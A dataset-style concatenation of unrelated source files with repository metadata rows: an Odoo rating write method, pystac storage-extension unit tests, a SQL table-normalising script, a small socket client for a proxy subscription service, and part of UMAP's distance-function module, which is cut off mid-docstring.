            ``website.group_website_publisher`` sets ``publisher_comment``.
        """
        # NOTE(review): truthiness check -- writing an *empty* comment skips
        # the access check and the stamping below; confirm this is intended.
        if values.get('publisher_comment'):
            if not self.env.user.has_group("website.group_website_publisher"):
                raise exceptions.AccessError(_("Only the publisher of the website can change the rating comment"))
            if not values.get('publisher_datetime'):
                values['publisher_datetime'] = fields.Datetime.now()
            if not values.get('publisher_id'):
                values['publisher_id'] = self.env.user.partner_id.id
        return super(Rating, self).write(values)
| 45.538462 | 114 | 0.669764 |
f24f87f67193b1e2ebef8bfcda90dd0fa644af3f | 12,022 | py | Python | tests/extensions/test_storage.py | itcarroll/pystac | 6c00d2efbf2fece6ac10d9e5d6a712aee75057a2 | [
"Apache-2.0"
] | 60 | 2019-09-09T20:14:08.000Z | 2020-08-19T06:59:33.000Z | tests/extensions/test_storage.py | itcarroll/pystac | 6c00d2efbf2fece6ac10d9e5d6a712aee75057a2 | [
"Apache-2.0"
] | 87 | 2019-09-14T15:47:23.000Z | 2020-08-19T16:23:32.000Z | tests/extensions/test_storage.py | itcarroll/pystac | 6c00d2efbf2fece6ac10d9e5d6a712aee75057a2 | [
"Apache-2.0"
] | 24 | 2019-10-16T17:13:46.000Z | 2020-08-19T04:36:58.000Z | import json
import random
import unittest
from string import ascii_letters
import pystac
from pystac import ExtensionTypeError, Item
from pystac.collection import Collection
from pystac.extensions.storage import StorageExtension, CloudPlatform
from tests.utils import TestCases, assert_to_from_dict
class StorageExtensionTest(unittest.TestCase):
    """Shared fixtures for the storage-extension test cases below."""

    # Paths to the test data files used across the subclasses.
    NAIP_EXAMPLE_URI = TestCases.get_path("data-files/storage/item-naip.json")
    PLAIN_ITEM_URI = TestCases.get_path("data-files/item/sample-item.json")
    NAIP_COLLECTION_URI = TestCases.get_path("data-files/storage/collection-naip.json")

    def setUp(self) -> None:
        """Load fresh copies of the fixture Items/Collection for each test."""
        self.maxDiff = None
        self.naip_item = Item.from_file(self.NAIP_EXAMPLE_URI)
        self.plain_item = Item.from_file(self.PLAIN_ITEM_URI)
        self.naip_collection = Collection.from_file(self.NAIP_COLLECTION_URI)
class ItemStorageExtensionTest(StorageExtensionTest):
    """Tests for applying/removing StorageExtension on Items and Assets."""

    def test_to_from_dict(self) -> None:
        """An extended item round-trips through its dict representation."""
        with open(self.NAIP_EXAMPLE_URI) as f:
            item_dict = json.load(f)
        assert_to_from_dict(self, Item, item_dict)

    def test_add_to(self) -> None:
        """add_to() registers the schema URI exactly once."""
        item = self.plain_item
        self.assertNotIn(
            StorageExtension.get_schema_uri(), self.plain_item.stac_extensions
        )

        # Check that the URI gets added to stac_extensions
        StorageExtension.add_to(item)
        self.assertIn(StorageExtension.get_schema_uri(), item.stac_extensions)

        # Check that the URI only gets added once, regardless of how many times add_to
        # is called.
        StorageExtension.add_to(item)
        StorageExtension.add_to(item)

        eo_uris = [
            uri
            for uri in item.stac_extensions
            if uri == StorageExtension.get_schema_uri()
        ]
        self.assertEqual(len(eo_uris), 1)

    def test_validate_storage(self) -> None:
        """The NAIP fixture item validates against the extension schema."""
        self.naip_item.validate()

    def test_extend_invalid_object(self) -> None:
        """ext() rejects object types the extension does not apply to."""
        link = pystac.Link("child", "https://some-domain.com/some/path/to.json")
        with self.assertRaises(pystac.ExtensionTypeError):
            StorageExtension.ext(link)  # type: ignore

    def test_extension_not_implemented(self) -> None:
        """ext() without add_if_missing requires the URI to be declared."""
        # Should raise exception if Item does not include extension URI
        item = pystac.Item.from_file(self.PLAIN_ITEM_URI)

        with self.assertRaises(pystac.ExtensionNotImplemented):
            _ = StorageExtension.ext(item)

        # Should raise exception if owning Item does not include extension URI
        asset = item.assets["thumbnail"]

        with self.assertRaises(pystac.ExtensionNotImplemented):
            _ = StorageExtension.ext(asset)

        # Should succeed if Asset has no owner
        ownerless_asset = pystac.Asset.from_dict(asset.to_dict())
        _ = StorageExtension.ext(ownerless_asset)

    def test_item_ext_add_to(self) -> None:
        """ext(item, add_if_missing=True) registers the schema URI."""
        item = pystac.Item.from_file(self.PLAIN_ITEM_URI)
        self.assertNotIn(StorageExtension.get_schema_uri(), item.stac_extensions)

        _ = StorageExtension.ext(item, add_if_missing=True)
        self.assertIn(StorageExtension.get_schema_uri(), item.stac_extensions)

    def test_asset_ext_add_to(self) -> None:
        """Extending an owned asset registers the URI on the owning item."""
        item = pystac.Item.from_file(self.PLAIN_ITEM_URI)
        self.assertNotIn(StorageExtension.get_schema_uri(), item.stac_extensions)
        asset = item.assets["thumbnail"]

        _ = StorageExtension.ext(asset, add_if_missing=True)
        self.assertIn(StorageExtension.get_schema_uri(), item.stac_extensions)

    def test_asset_ext_add_to_ownerless_asset(self) -> None:
        """add_if_missing on an ownerless asset fails (no item to update)."""
        item = pystac.Item.from_file(self.PLAIN_ITEM_URI)
        asset_dict = item.assets["thumbnail"].to_dict()
        asset = pystac.Asset.from_dict(asset_dict)

        with self.assertRaises(pystac.STACError):
            _ = StorageExtension.ext(asset, add_if_missing=True)

    def test_should_raise_exception_when_passing_invalid_extension_object(
        self,
    ) -> None:
        """ext() names the offending type in its error message."""
        self.assertRaisesRegex(
            ExtensionTypeError,
            r"^StorageExtension does not apply to type 'object'$",
            StorageExtension.ext,
            object(),
        )
class StorageExtensionSummariesTest(StorageExtensionTest):
    """Tests for get/set of storage summary fields on a Collection."""

    def test_platform(self) -> None:
        """storage:platform summary reads from and writes to the dict."""
        col = self.naip_collection
        col_dict = col.to_dict()
        storage_summaries = StorageExtension.summaries(col)

        # Get
        self.assertEqual(
            storage_summaries.platform, col_dict["summaries"]["storage:platform"]
        )

        # Set
        new_platform_summary = [random.choice([v for v in CloudPlatform])]
        self.assertNotEqual(storage_summaries.platform, new_platform_summary)
        storage_summaries.platform = new_platform_summary
        self.assertEqual(storage_summaries.platform, new_platform_summary)

        # The change is reflected in the serialized collection.
        col_dict = col.to_dict()
        self.assertEqual(
            col_dict["summaries"]["storage:platform"], new_platform_summary
        )

    def test_region(self) -> None:
        """storage:region summary reads from and writes to the dict."""
        col = self.naip_collection
        col_dict = col.to_dict()
        storage_summaries = StorageExtension.summaries(col)

        # Get
        self.assertEqual(
            storage_summaries.region, col_dict["summaries"]["storage:region"]
        )

        # Set
        new_region_summary = [random.choice(ascii_letters)]
        self.assertNotEqual(storage_summaries.region, new_region_summary)
        storage_summaries.region = new_region_summary
        self.assertEqual(storage_summaries.region, new_region_summary)

        col_dict = col.to_dict()
        self.assertEqual(col_dict["summaries"]["storage:region"], new_region_summary)

    def test_requester_pays(self) -> None:
        """storage:requester_pays summary reads from and writes to the dict."""
        col = self.naip_collection
        col_dict = col.to_dict()
        storage_summaries = StorageExtension.summaries(col)

        # Get
        self.assertEqual(
            storage_summaries.requester_pays,
            col_dict["summaries"]["storage:requester_pays"],
        )

        # Set
        new_requester_pays_summary = [True]
        self.assertNotEqual(
            storage_summaries.requester_pays, new_requester_pays_summary
        )
        storage_summaries.requester_pays = new_requester_pays_summary
        self.assertEqual(storage_summaries.requester_pays, new_requester_pays_summary)

        col_dict = col.to_dict()
        self.assertEqual(
            col_dict["summaries"]["storage:requester_pays"], new_requester_pays_summary
        )

    def test_tier(self) -> None:
        """storage:tier summary reads from and writes to the dict."""
        col = self.naip_collection
        col_dict = col.to_dict()
        storage_summaries = StorageExtension.summaries(col)

        # Get
        self.assertEqual(storage_summaries.tier, col_dict["summaries"]["storage:tier"])

        # Set
        new_tier_summary = [random.choice(ascii_letters)]
        self.assertNotEqual(storage_summaries.tier, new_tier_summary)
        storage_summaries.tier = new_tier_summary
        self.assertEqual(storage_summaries.tier, new_tier_summary)

        col_dict = col.to_dict()
        self.assertEqual(col_dict["summaries"]["storage:tier"], new_tier_summary)

    def test_summaries_adds_uri(self) -> None:
        """summaries(add_if_missing=True) registers (and remove_from clears)
        the schema URI on the collection."""
        col = self.naip_collection
        col.stac_extensions = []
        self.assertRaisesRegex(
            pystac.ExtensionNotImplemented,
            r"Could not find extension schema URI.*",
            StorageExtension.summaries,
            col,
            False,
        )
        _ = StorageExtension.summaries(col, add_if_missing=True)

        self.assertIn(StorageExtension.get_schema_uri(), col.stac_extensions)

        StorageExtension.remove_from(col)
        self.assertNotIn(StorageExtension.get_schema_uri(), col.stac_extensions)
class AssetStorageExtensionTest(StorageExtensionTest):
    """Tests for get/set of storage fields on individual Assets."""

    def test_item_apply(self) -> None:
        """apply() sets all four storage properties at once."""
        item = self.naip_item
        asset = random.choice(list(item.assets.values()))
        storage_ext = StorageExtension.ext(asset)

        # Pick values guaranteed to differ from the current ones.
        new_platform = random.choice(
            [v for v in CloudPlatform if v != storage_ext.platform]
        )
        new_region = random.choice(ascii_letters)
        new_requestor_pays = random.choice(
            [v for v in {True, False} if v != storage_ext.requester_pays]
        )
        new_tier = random.choice(ascii_letters)

        storage_ext.apply(
            platform=new_platform,
            region=new_region,
            requester_pays=new_requestor_pays,
            tier=new_tier,
        )

        self.assertEqual(storage_ext.platform, new_platform)
        self.assertEqual(storage_ext.region, new_region)
        self.assertEqual(storage_ext.requester_pays, new_requestor_pays)
        self.assertEqual(storage_ext.tier, new_tier)

    def test_platform(self) -> None:
        """storage:platform is read from and written to asset extra_fields."""
        item = self.naip_item

        # Grab a random asset with the platform property
        asset = random.choice(
            [
                _asset
                for _asset in item.assets.values()
                if "storage:platform" in _asset.to_dict()
            ]
        )
        storage_ext = StorageExtension.ext(asset)

        # Get
        self.assertEqual(
            storage_ext.platform, asset.extra_fields.get("storage:platform")
        )

        # Set
        new_platform = random.choice(
            [val for val in CloudPlatform if val != storage_ext.platform]
        )
        storage_ext.platform = new_platform
        self.assertEqual(storage_ext.platform, new_platform)

        item.validate()

    def test_region(self) -> None:
        """storage:region get/set; assigning None removes the field."""
        item = self.naip_item

        # Grab a random asset with the platform property
        asset = random.choice(
            [
                _asset
                for _asset in item.assets.values()
                if "storage:region" in _asset.to_dict()
            ]
        )
        storage_ext = StorageExtension.ext(asset)

        # Get
        self.assertEqual(storage_ext.region, asset.extra_fields.get("storage:region"))

        # Set
        new_region = random.choice(
            [val for val in CloudPlatform if val != storage_ext.region]
        )
        storage_ext.region = new_region
        self.assertEqual(storage_ext.region, new_region)

        item.validate()

        # Set to None
        storage_ext.region = None
        self.assertNotIn("storage:region", asset.extra_fields)

    def test_requester_pays(self) -> None:
        """storage:requester_pays get/set; assigning None removes the field."""
        item = self.naip_item

        # Grab a random asset with the platform property
        asset = random.choice(
            [
                _asset
                for _asset in item.assets.values()
                if "storage:requester_pays" in _asset.to_dict()
            ]
        )
        storage_ext = StorageExtension.ext(asset)

        # Get
        self.assertEqual(
            storage_ext.requester_pays, asset.extra_fields.get("storage:requester_pays")
        )

        # Set
        new_requester_pays = True if not storage_ext.requester_pays else False
        storage_ext.requester_pays = new_requester_pays
        self.assertEqual(storage_ext.requester_pays, new_requester_pays)

        item.validate()

        # Set to None
        storage_ext.requester_pays = None
        self.assertNotIn("storage:requester_pays", asset.extra_fields)

    def test_tier(self) -> None:
        """storage:tier get/set; assigning None removes the field."""
        item = self.naip_item

        # Grab a random asset with the platform property
        asset = random.choice(
            [
                _asset
                for _asset in item.assets.values()
                if "storage:tier" in _asset.to_dict()
            ]
        )
        storage_ext = StorageExtension.ext(asset)

        # Get
        self.assertEqual(storage_ext.tier, asset.extra_fields.get("storage:tier"))

        # Set
        new_tier = random.choice(ascii_letters)
        storage_ext.tier = new_tier
        self.assertEqual(storage_ext.tier, new_tier)

        item.validate()

        # Set to None
        storage_ext.tier = None
        self.assertNotIn("storage:tier", asset.extra_fields)
| 33.581006 | 88 | 0.65297 |
2be1089a4679f0e8a7259599e7dceafd8a679054 | 2,601 | py | Python | helper/baseballgenSQL.py | xu6148152/Binea_Python_Project | d943eb5f4685d08f080b372dcf1a7cbd5d63efed | [
"MIT"
] | null | null | null | helper/baseballgenSQL.py | xu6148152/Binea_Python_Project | d943eb5f4685d08f080b372dcf1a7cbd5d63efed | [
"MIT"
] | null | null | null | helper/baseballgenSQL.py | xu6148152/Binea_Python_Project | d943eb5f4685d08f080b372dcf1a7cbd5d63efed | [
"MIT"
] | null | null | null | import os
import re
import originSqlRefine
import sys
import myUtil
def main(path):
    r"""Normalise every ``*.sql`` table script under *path* into ``.\sql\``.

    For each statement of each SQL file this:
      * drops ``BEGIN``/``COMMIT`` and empty statements,
      * removes double-quote and backtick identifier quoting,
      * flattens the statement onto one line and blanks ``UNIQUE``,
      * lower-cases occurrences of the table name (derived from the file name),
      * injects an explicit column list into ``club_information`` inserts.

    :param path: directory containing the ``.sql`` files (an svn working
        copy; ``svn up`` is run on it first).
    """
    print('path='+path)
    # Refresh the working copy so we convert the current files.
    myUtil.myPopen(myUtil.svnCmd + ' up', path, encoding='gbk')
    outpath = r'.\sql\\'
    if not os.path.isdir(outpath):
        os.mkdir(outpath)
    for fname in os.listdir(path):
        if not fname.endswith(".sql"):
            continue
        # Bug fix: open the input under its *original* name; only the output
        # name and the table name are lower-cased.  The old code lower-cased
        # before opening, which breaks on case-sensitive file systems.
        lowered = fname.lower()
        print(lowered)
        tablename = lowered.replace(".sql", '')
        print('tablename=' + tablename)
        with open(path + fname, 'r') as f:
            sqls = f.read().split(';')
        print(sqls[0])
        # Bug fix: context manager guarantees the output file is closed even
        # if processing a statement raises.
        with open(outpath + lowered, 'w') as fout:
            for sql in sqls:
                sql = sql.strip()
                if sql.startswith('BEGIN') or sql.startswith('COMMIT') or len(sql) == 0:
                    continue
                # Strip "..." quoting around identifiers.
                for word in re.findall(r'\".+?\"', sql):
                    sql = sql.replace(word, word[1:-1])
                # Strip `...` quoting around identifiers.
                for word in re.findall(r'\`.+?\`', sql):
                    sql = sql.replace(word, word[1:-1])
                sql = sql.replace('\n', ' ')
                sql = sql.replace('UNIQUE', ' ')
                # Lower-case the table name wherever it appears.
                if tablename in sql.lower():
                    print('sub:' + tablename)
                    # Bug fix: re.escape -- table names derived from file
                    # names may contain regex metacharacters.
                    sql = re.sub(re.escape(tablename), tablename.lower(), sql, flags=re.IGNORECASE)
                if sql.startswith('INSERT INTO club_information'):
                    index = sql.find('VALUE')
                    sql = sql[:index] + ' (Make_ID , Model_ID , Make_Name, Model_Name , Type_1, Type_2 , Loft , Length , Shaft , Flex , icon_index ) ' + sql[index:]
                fout.write(sql + ';\n')
if __name__ == '__main__':
    # Entry point: expects the svn root as the first CLI argument and derives
    # the table-model directory from it.
    path = ''
    if len(sys.argv) > 1:
        path = sys.argv[1] + r'\baseball\trunk\model\db_p\tablemodel\\'
    else:
        raise Exception('Please input ios svn root path')
    # path = r'd:\workspace\golfsense\svn_gs2\ios\golfsense\trunk\model\db_p\tablemodel\\'
    main(path)
    # Run the follow-up refinement pass over the generated SQL.
    originSqlRefine.main()
| 29.224719 | 218 | 0.417147 |
f6de5403105a546d91ec40dc31a9d174266315a6 | 1,790 | py | Python | src/test/lcv2-2ray-5.0.1-/v2ray_old_3_2019-1-4/client/windows/mods/s_server.py | lucycore/lcv2 | cfda722b430036e2a2de946b71d81d265e2165dc | [
"MIT"
] | null | null | null | src/test/lcv2-2ray-5.0.1-/v2ray_old_3_2019-1-4/client/windows/mods/s_server.py | lucycore/lcv2 | cfda722b430036e2a2de946b71d81d265e2165dc | [
"MIT"
] | null | null | null | src/test/lcv2-2ray-5.0.1-/v2ray_old_3_2019-1-4/client/windows/mods/s_server.py | lucycore/lcv2 | cfda722b430036e2a2de946b71d81d265e2165dc | [
"MIT"
] | null | null | null | import socket
from urllib import request
def mod_1(user_id):
    '''
    Normal connection mode.

    Data required:
        uuid

    Server reply fields (dot-separated):
        re   -> whether the connection is allowed
        time -> expiry time
        json -> v2 server configuration file
        gg   -> server announcement
    '''
    # Create the socket and connect to the control server.
    sock = socket.socket()
    HOST = "192.168.1.104"
    PORT = 2233
    sock.connect((HOST, PORT))
    # Announce the mode.
    sock.sendall("mod_1".encode())
    server_myd = sock.recv(1024).decode()
    # Send the uuid.
    sock.sendall(user_id.encode())
    # Receive the server's status string.
    server_s = sock.recv(1024).decode()
    sock.close()
    # Split the reply on '.' into its fields.
    # NOTE(review): assumes no field itself contains '.', which a JSON
    # payload normally would -- confirm the server-side encoding.
    sr_lb = server_s.split('.')
    sr_re = sr_lb[0]
    sr_time = sr_lb[1]
    sr_json = sr_lb[2]
    sr_gg = sr_lb[3]
    sr_x = sr_lb[4]
    return sr_re,sr_time,sr_json,sr_gg,sr_x
def mod_2(user_id):
    '''
    Key-activation mode.

    Prompts the user for an activation key and submits it to the server.

    Data required:
        uuid, key

    Server reply:
        "True" if activation succeeded; on any other reply the user is
        prompted again (recursively).
    '''
    print("您还没有激活 或 已到期!")
    print("请重新输入密钥激活程序!")
    key = input("请输入密钥:")
    while key == "":
        print("不可以输入空白内容!")
        key = input("请输入密钥:")
    # Create the socket and connect to the control server.
    sock = socket.socket()
    HOST = "192.168.1.104"
    PORT = 2233
    sock.connect((HOST, PORT))
    # Announce the mode.
    sock.sendall("mod_2".encode())
    server_myd = sock.recv(1024).decode()
    # Send the uuid.
    sock.sendall(user_id.encode())
    server_myd = sock.recv(1024).decode()
    # Send the key.
    # Bug fix: previously user_id was sent again here, so the key typed by
    # the user never reached the server and activation could not work.
    sock.sendall(key.encode())
    # Receive the server's status code.
    server_s = sock.recv(1024).decode()
    sock.close()
    # Interpret the reply.
    if server_s == "True":
        print("激活成功!")
        print("正在重启程序!")
    else:
        print("激活失败!")
        print("请重新输入密钥!")
        mod_2(user_id)
def mod_3(user_id):
    '''
    Registration mode.

    Data required:
        uuid

    Server reply:
        re -> whether registration succeeded
    '''
    # Create the socket and connect to the control server.
    sock = socket.socket()
    HOST = "192.168.1.104"
    PORT = 2233
    sock.connect((HOST, PORT))
    # Announce the mode.
    sock.sendall("mod_3".encode())
    server_myd = sock.recv(1024).decode()
    # Send the uuid.
    sock.sendall(user_id.encode())
    # Receive the server's status code.
    server_s = sock.recv(1024).decode()
    sock.close()
    # Interpret the reply; retry (recursively) until registration succeeds.
    sr_re = server_s
    if sr_re == "True":
        print("注册成功!")
    else:
        mod_3(user_id)
1ac68b2fa32f8bcbc9a2e791ab41b1ffaf62d9af | 34,724 | py | Python | umap/distances.py | worldbeater/umap | eb8c4b2bbb08c1fc9b6a983af8d50a8d03468735 | [
"BSD-3-Clause"
] | 5,537 | 2017-07-09T20:26:23.000Z | 2022-03-29T17:11:16.000Z | umap/distances.py | worldbeater/umap | eb8c4b2bbb08c1fc9b6a983af8d50a8d03468735 | [
"BSD-3-Clause"
] | 776 | 2017-07-09T17:20:20.000Z | 2022-03-31T13:37:40.000Z | umap/distances.py | worldbeater/umap | eb8c4b2bbb08c1fc9b6a983af8d50a8d03468735 | [
"BSD-3-Clause"
] | 712 | 2017-07-09T17:03:39.000Z | 2022-03-30T16:54:09.000Z | # Author: Leland McInnes <leland.mcinnes@gmail.com>
#
# License: BSD 3 clause
import numba
import numpy as np
import scipy.stats
from sklearn.metrics import pairwise_distances
# Default values for metrics with optional parameters (``vinv`` for
# mahalanobis, ``sigma``/``w`` for the standardised/weighted metrics).
_mock_identity = np.eye(2, dtype=np.float64)
_mock_cost = 1.0 - _mock_identity
_mock_ones = np.ones(2, dtype=np.float64)
@numba.njit()
def sign(a):
    """Return -1 for negative ``a``, else 1 (zero maps to 1)."""
    return -1 if a < 0 else 1
@numba.njit(fastmath=True)
def euclidean(x, y):
    r"""Standard euclidean distance.

    ..math::
        D(x, y) = \sqrt{\sum_i (x_i - y_i)^2}
    """
    sq_sum = 0.0
    for dim in range(x.shape[0]):
        diff = x[dim] - y[dim]
        sq_sum += diff * diff
    return np.sqrt(sq_sum)
@numba.njit(fastmath=True)
def euclidean_grad(x, y):
    r"""Standard euclidean distance and its gradient.

    ..math::
        D(x, y) = \sqrt{\sum_i (x_i - y_i)^2}
        \frac{dD(x, y)}{dx} = (x_i - y_i)/D(x,y)
    """
    sq_sum = 0.0
    for dim in range(x.shape[0]):
        diff = x[dim] - y[dim]
        sq_sum += diff * diff
    dist = np.sqrt(sq_sum)
    # Small epsilon keeps the gradient finite when x == y.
    grad = (x - y) / (1e-6 + dist)
    return dist, grad
@numba.njit()
def standardised_euclidean(x, y, sigma=_mock_ones):
    r"""Euclidean distance standardised against a vector of standard
    deviations per coordinate.

    ..math::
        D(x, y) = \sqrt{\sum_i \frac{(x_i - y_i)**2}{v_i}}
    """
    acc = 0.0
    for dim in range(x.shape[0]):
        diff = x[dim] - y[dim]
        acc += (diff * diff) / sigma[dim]
    return np.sqrt(acc)
@numba.njit(fastmath=True)
def standardised_euclidean_grad(x, y, sigma=_mock_ones):
    r"""Euclidean distance standardised against a vector of standard
    deviations per coordinate, with gradient.

    ..math::
        D(x, y) = \sqrt{\sum_i \frac{(x_i - y_i)**2}{v_i}}
    """
    acc = 0.0
    for dim in range(x.shape[0]):
        diff = x[dim] - y[dim]
        acc += diff * diff / sigma[dim]
    dist = np.sqrt(acc)
    # Epsilon keeps the gradient finite when x == y.
    grad = (x - y) / (1e-6 + dist * sigma)
    return dist, grad
@numba.njit()
def manhattan(x, y):
    r"""Manhattan, taxicab, or l1 distance.

    ..math::
        D(x, y) = \sum_i |x_i - y_i|
    """
    total = 0.0
    for dim in range(x.shape[0]):
        total += np.abs(x[dim] - y[dim])
    return total
@numba.njit()
def manhattan_grad(x, y):
    r"""Manhattan, taxicab, or l1 distance with gradient.

    ..math::
        D(x, y) = \sum_i |x_i - y_i|
    """
    total = 0.0
    grad = np.zeros(x.shape)
    for dim in range(x.shape[0]):
        diff = x[dim] - y[dim]
        total += np.abs(diff)
        grad[dim] = np.sign(diff)
    return total, grad
@numba.njit()
def chebyshev(x, y):
    r"""Chebyshev or l-infinity distance.

    ..math::
        D(x, y) = \max_i |x_i - y_i|
    """
    best = 0.0
    for dim in range(x.shape[0]):
        diff = np.abs(x[dim] - y[dim])
        if diff > best:
            best = diff
    return best
@numba.njit()
def chebyshev_grad(x, y):
    r"""Chebyshev or l-infinity distance with gradient.

    ..math::
        D(x, y) = \max_i |x_i - y_i|
    """
    best = 0.0
    best_dim = 0
    for dim in range(x.shape[0]):
        diff = np.abs(x[dim] - y[dim])
        if diff > best:
            best = diff
            best_dim = dim
    # The gradient is non-zero only in the coordinate achieving the max.
    grad = np.zeros(x.shape)
    grad[best_dim] = np.sign(x[best_dim] - y[best_dim])
    return best, grad
@numba.njit()
def minkowski(x, y, p=2):
    r"""Minkowski distance.

    ..math::
        D(x, y) = \left(\sum_i |x_i - y_i|^p\right)^{\frac{1}{p}}

    This is a general distance. For p=1 it is equivalent to
    manhattan distance, for p=2 it is Euclidean distance, and
    for p=infinity it is Chebyshev distance. In general it is better
    to use the more specialised functions for those distances.
    """
    acc = 0.0
    for dim in range(x.shape[0]):
        acc += np.abs(x[dim] - y[dim]) ** p
    return acc ** (1.0 / p)
@numba.njit()
def minkowski_grad(x, y, p=2):
    r"""Minkowski distance with gradient.

    ..math::
        D(x, y) = \left(\sum_i |x_i - y_i|^p\right)^{\frac{1}{p}}

    This is a general distance. For p=1 it is equivalent to
    manhattan distance, for p=2 it is Euclidean distance, and
    for p=infinity it is Chebyshev distance. In general it is better
    to use the more specialised functions for those distances.
    """
    result = 0.0
    for i in range(x.shape[0]):
        result += (np.abs(x[i] - y[i])) ** p

    # d/dx_i of (sum_j |x_j - y_j|^p)^(1/p) is
    #   |x_i - y_i|^(p-1) * sign(x_i - y_i) * result^((1/p) - 1).
    # Bug fix: the outer exponent was previously 1/(p-1), which does not
    # match the derivative of the p-norm (for p=2 it failed to reduce to
    # the euclidean gradient (x - y) / D).
    if result > 0.0:
        outer = pow(result, (1.0 / p) - 1.0)
    else:
        outer = 0.0  # identical points: zero gradient
    grad = np.empty(x.shape[0], dtype=np.float32)
    for i in range(x.shape[0]):
        grad[i] = (
            pow(np.abs(x[i] - y[i]), (p - 1.0))
            * sign(x[i] - y[i])
            * outer
        )

    return result ** (1.0 / p), grad
@numba.njit()
def poincare(u, v):
    r"""Poincare distance.

    ..math::
        \delta (u, v) = 2 \frac{ \lVert u - v \rVert ^2 }{ ( 1 - \lVert u \rVert ^2 ) ( 1 - \lVert v \rVert ^2 ) }
        D(x, y) = \operatorname{arcosh} (1+\delta (u,v))
    """
    u_norm_sq = np.sum(u * u)
    v_norm_sq = np.sum(v * v)
    diff_sq = np.sum(np.power(u - v, 2))
    delta = 2 * (diff_sq / ((1 - u_norm_sq) * (1 - v_norm_sq)))
    return np.arccosh(1 + delta)
@numba.njit()
def hyperboloid_grad(x, y):
    """Hyperboloid-model distance and its gradient with respect to ``x``.

    Points in R^n are lifted onto the hyperboloid via the extra coordinate
    t = sqrt(1 + ||p||^2); the Minkowski form B = s*t - <x, y> then gives
    the distance arccosh(B).
    """
    s = np.sqrt(1 + np.sum(x ** 2))
    t = np.sqrt(1 + np.sum(y ** 2))
    B = s * t
    for i in range(x.shape[0]):
        B -= x[i] * y[i]
    if B <= 1:
        # Clamp so that arccosh and the gradient denominator stay defined.
        B = 1.0 + 1e-8
    # d(arccosh(B))/dB = 1 / sqrt(B^2 - 1), written as a stable product.
    grad_coeff = 1.0 / (np.sqrt(B - 1) * np.sqrt(B + 1))
    # return np.arccosh(B), np.zeros(x.shape[0])
    grad = np.zeros(x.shape[0])
    for i in range(x.shape[0]):
        # Chain rule through B: dB/dx_i = (x_i * t) / s - y_i.
        grad[i] = grad_coeff * (((x[i] * t) / s) - y[i])
    return np.arccosh(B), grad
@numba.njit()
def weighted_minkowski(x, y, w=_mock_ones, p=2):
    r"""A weighted version of Minkowski distance.

    ..math::
        D(x, y) = \left(\sum_i w_i |x_i - y_i|^p\right)^{\frac{1}{p}}

    If weights w_i are inverse standard deviations of data in each dimension
    then this represented a standardised Minkowski distance (and is
    equivalent to standardised Euclidean distance for p=1).
    """
    acc = 0.0
    for dim in range(x.shape[0]):
        acc += (w[dim] * np.abs(x[dim] - y[dim])) ** p
    return acc ** (1.0 / p)
@numba.njit()
def weighted_minkowski_grad(x, y, w=_mock_ones, p=2):
    r"""A weighted version of Minkowski distance with gradient.

    ..math::
        D(x, y) = \left(\sum_i w_i |x_i - y_i|^p\right)^{\frac{1}{p}}

    If weights w_i are inverse standard deviations of data in each dimension
    then this represented a standardised Minkowski distance (and is
    equivalent to standardised Euclidean distance for p=1).
    """
    result = 0.0
    for i in range(x.shape[0]):
        result += (w[i] * np.abs(x[i] - y[i])) ** p

    # d/dx_i of (sum_j (w_j |x_j - y_j|)^p)^(1/p) is
    #   w_i^p * |x_i - y_i|^(p-1) * sign(x_i - y_i) * result^((1/p) - 1).
    # Bug fix: the outer exponent was previously 1/(p-1), which does not
    # match the derivative of the weighted p-norm.
    if result > 0.0:
        outer = pow(result, (1.0 / p) - 1.0)
    else:
        outer = 0.0  # identical points: zero gradient
    grad = np.empty(x.shape[0], dtype=np.float32)
    for i in range(x.shape[0]):
        grad[i] = (
            w[i] ** p
            * pow(np.abs(x[i] - y[i]), (p - 1.0))
            * sign(x[i] - y[i])
            * outer
        )

    return result ** (1.0 / p), grad
@numba.njit()
def mahalanobis(x, y, vinv=_mock_identity):
    """Mahalanobis distance sqrt((x-y)^T vinv (x-y)) for inverse covariance vinv."""
    delta = np.empty(x.shape[0], dtype=np.float32)
    for i in range(x.shape[0]):
        delta[i] = x[i] - y[i]
    total = 0.0
    for i in range(x.shape[0]):
        row_dot = 0.0
        for j in range(x.shape[0]):
            row_dot += vinv[i, j] * delta[j]
        total += row_dot * delta[i]
    return np.sqrt(total)
@numba.njit()
def mahalanobis_grad(x, y, vinv=_mock_identity):
    """Mahalanobis distance and its gradient w.r.t. x.

    NOTE(review): the gradient accumulates vinv rows only, which equals the
    analytic gradient when vinv is symmetric — confirm that assumption holds
    for all callers.
    """
    result = 0.0
    diff = np.empty(x.shape[0], dtype=np.float32)
    for i in range(x.shape[0]):
        diff[i] = x[i] - y[i]
    grad_tmp = np.zeros(x.shape)
    for i in range(x.shape[0]):
        tmp = 0.0
        for j in range(x.shape[0]):
            tmp += vinv[i, j] * diff[j]
            grad_tmp[i] += vinv[i, j] * diff[j]
        result += tmp * diff[i]
    dist = np.sqrt(result)
    # 1e-6 guards against division by zero when the points coincide.
    grad = grad_tmp / (1e-6 + dist)
    return dist, grad
@numba.njit()
def hamming(x, y):
    """Fraction of coordinates at which x and y differ."""
    n_mismatch = 0.0
    for d in range(x.shape[0]):
        if x[d] != y[d]:
            n_mismatch += 1.0
    return float(n_mismatch) / x.shape[0]
@numba.njit()
def canberra(x, y):
    """Canberra distance: sum of |x_i - y_i| / (|x_i| + |y_i|), skipping zero denominators."""
    total = 0.0
    for i in range(x.shape[0]):
        scale = np.abs(x[i]) + np.abs(y[i])
        if scale > 0:
            total += np.abs(x[i] - y[i]) / scale
    return total
@numba.njit()
def canberra_grad(x, y):
    """Canberra distance and its gradient w.r.t. x.

    Coordinates where both entries are zero contribute nothing to either
    the distance or the gradient.
    """
    result = 0.0
    grad = np.zeros(x.shape)
    for i in range(x.shape[0]):
        denominator = np.abs(x[i]) + np.abs(y[i])
        if denominator > 0:
            result += np.abs(x[i] - y[i]) / denominator
            # Quotient rule: d/dx_i of |x_i - y_i| / (|x_i| + |y_i|).
            grad[i] = (
                np.sign(x[i] - y[i]) / denominator
                - np.abs(x[i] - y[i]) * np.sign(x[i]) / denominator ** 2
            )
    return result, grad
@numba.njit()
def bray_curtis(x, y):
    """Bray-Curtis dissimilarity; 0.0 when the normalising sum vanishes."""
    num = 0.0
    denom = 0.0
    for i in range(x.shape[0]):
        num += np.abs(x[i] - y[i])
        denom += np.abs(x[i] + y[i])
    if denom > 0.0:
        return float(num) / denom
    return 0.0
@numba.njit()
def bray_curtis_grad(x, y):
    """Bray-Curtis dissimilarity and its gradient w.r.t. x.

